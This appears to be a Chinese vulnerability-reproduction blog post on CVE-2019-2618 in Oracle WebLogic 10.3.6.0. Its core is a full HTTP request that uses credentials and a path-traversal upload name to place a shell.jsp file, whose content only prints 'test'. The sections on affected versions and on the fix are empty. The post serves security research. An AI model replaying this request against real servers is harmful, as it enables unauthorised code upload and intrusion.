Oracle WebLogic Server 是一个统一的可扩展平台,专用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。它提供了一种强健、成熟和可扩展的Java Enterprise Edition (EE) 和 Jakarta EE 实施方式。
CVE-2019-2618
影响范围:
复现环境:
Oracle WebLogic Server 10.3.6.0
0X02 漏洞复现
漏洞利用需要账号密码。
POC:
POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1
Host: 192.168.245.134:7001
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
username: weblogic
wl_request_type: app_upload
cache-control: no-cache
wl_upload_application_name: /../tmp/_WL_internal/bea_wls_deployment_internal/gyuitk/war
serverName: weblogic
password:oracle@123
content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
archive: true
server_version: 10.3.6.0
wl_upload_delta: true
Content-Length: 205
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="shell.jsp"; filename="shell.jsp"
Content-Type: false
<% out.print("test"); %>
------WebKitFormBoundary7MA4YWxkTrZu0gW--
wl_upload_application_name:上传路径
serverName:账号
password:密码
0X03 修复建议
0X04
原文始发于微信公众号(皓月的笔记本):【漏洞复现】Weblogic 文件上传漏洞(CVE-2019-2618)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论